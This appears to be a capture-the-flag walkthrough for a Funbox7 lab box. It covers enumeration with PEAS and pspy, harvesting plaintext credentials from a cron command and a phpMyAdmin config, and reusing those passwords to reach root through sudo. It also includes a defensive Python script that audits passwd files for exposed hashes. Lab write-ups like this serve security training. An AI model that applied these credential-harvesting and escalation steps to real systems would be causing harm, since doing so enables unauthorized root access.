3 box enum www-data > privesc > root
www-data@funbox7:/home$ ls -la
total 28
drwxr-xr-x 7 root root 4096 Sep 18 2020 .
drwxr-xr-x 24 root root 4096 Sep 19 2020 ..
drwxr-xr-x 2 goat goat 4096 Feb 16 13:25 goat
drwxr-xr-x 2 harry harry 4096 Jan 28 2021 harry
drwxr-xr-x 2 karla karla 4096 Feb 16 13:23 karla
drwxr-xr-x 2 oracle oracle 4096 Feb 16 13:23 oracle
drwxr-xr-x 2 sally sally 4096 Jan 28 2021 sally
# no files in any user's home directory
# nothing in /opt
PEAS
╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
╣ Users with console
goat:x:1003:1003:,,,:/home/goat:/bin/bash
harry:x:1001:1001:,,,:/home/harry:/bin/bash
karla:x:1000:1000:karla:/home/karla:/bin/bash
lissy:x:1005:1005::/home/lissy:/bin/sh
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
root:x:0:0:root:/root:/bin/bash
sally:x:1002:1002:,,,:/home/sally:/bin/bash
╣ MySQL version
mysql Ver 14.14 Distrib 5.7.31, for Linux (x86_64) using EditLine wrapper
╣ SUID - Check easy privesc, exploits and write perms
-rwsr-xr-x 1 root root 22K Mar 27 2019 /usr/bin/pkexec
╣ SGID
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at
# we can become oracle since we have the password
www-data@funbox7:/var/www/html$ su oracle
Password:
oracle@funbox7:/var/www/html$ whoami;id
oracle
uid=1004(oracle) gid=1004(oracle) groups=1004(oracle)
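# The oracle entry in the PEAS output above keeps a $1$ (MD5-crypt) hash in the world-readable /etc/passwd instead of the "x" placeholder that points to /etc/shadow. The audit below is an added example, not part of the original notes: it flags any passwd-format line whose password field holds a hash or is empty. The function name and the scheme table are assumptions made for this example.

```python
import re

# Password-field values that mean "no hash stored here" (x = look in /etc/shadow).
PLACEHOLDERS = {"x", "*", "!", "!!"}
# crypt(3) prefix -> (scheme name, considered weak today)
SCHEMES = {"1": ("md5crypt", True), "5": ("sha256crypt", False),
           "6": ("sha512crypt", False), "y": ("yescrypt", False),
           "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False)}

# Account lines copied from the PEAS "Users with console" output on this page.
SAMPLE = [
    "goat:x:1003:1003:,,,:/home/goat:/bin/bash",
    "harry:x:1001:1001:,,,:/home/harry:/bin/bash",
    "karla:x:1000:1000:karla:/home/karla:/bin/bash",
    "lissy:x:1005:1005::/home/lissy:/bin/sh",
    r"oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash",
    "root:x:0:0:root:/root:/bin/bash",
    "sally:x:1002:1002:,,,:/home/sally:/bin/bash",
]

def audit_passwd(lines):
    """Return one finding per entry whose password field is exposed or malformed."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"line": lineno, "user": fields[0], "issue": "malformed"})
            continue
        user, pw = fields[0], fields[1]
        if pw in PLACEHOLDERS:
            continue  # hash lives in /etc/shadow or the account is locked
        if pw == "":
            findings.append({"line": lineno, "user": user, "issue": "empty-password"})
            continue
        m = re.match(r"\$([0-9a-z]+)\$", pw)
        # No $id$ prefix means legacy DES crypt or an unrecognised value: treat as weak.
        scheme, weak = SCHEMES.get(m.group(1), ("unknown", True)) if m else ("descrypt-or-unknown", True)
        findings.append({"line": lineno, "user": user, "issue": "hash-in-passwd",
                         "scheme": scheme, "weak": weak})
    return findings

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE):
        print(finding)
```

# To audit a live host, pass `open("/etc/passwd")` instead of SAMPLE; any finding means the hash should be moved to /etc/shadow and the password rotated.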
pspy
2021/08/13 18:16:01 CMD: UID=0 PID=24777 | /usr/sbin/CRON -f
2021/08/13 18:17:01 CMD: UID=0 PID=24787 | tar -cvzf /root/html.tar.gz /var/www/html/ -ulissy -pgangsta
2021/08/13 18:17:01 CMD: UID=0 PID=24784 | /bin/sh -c tar -cvzf /root/html.tar.gz /var/www/html/ -ulissy -pgangsta
www-data@funbox7:/tmp$ cat /etc/phpmyadmin/config-db.php
<?php
$dbuser='phpmyadmin';
$dbpass='tgbzhnujm!';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';
www-data@funbox7:/tmp$
http://192.168.105.132/phpmyadmin
# logged in
# nothing in pma__users
# trying password for different users
www-data@funbox7:/tmp$ su karla
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
karla@funbox7:/tmp$ sudo -l
[sudo] password for karla:
Matching Defaults entries for karla on funbox7:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User karla may run the following commands on funbox7:
(ALL : ALL) ALL
karla@funbox7:/tmp$ sudo su
root@funbox7:/tmp# whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
funbox7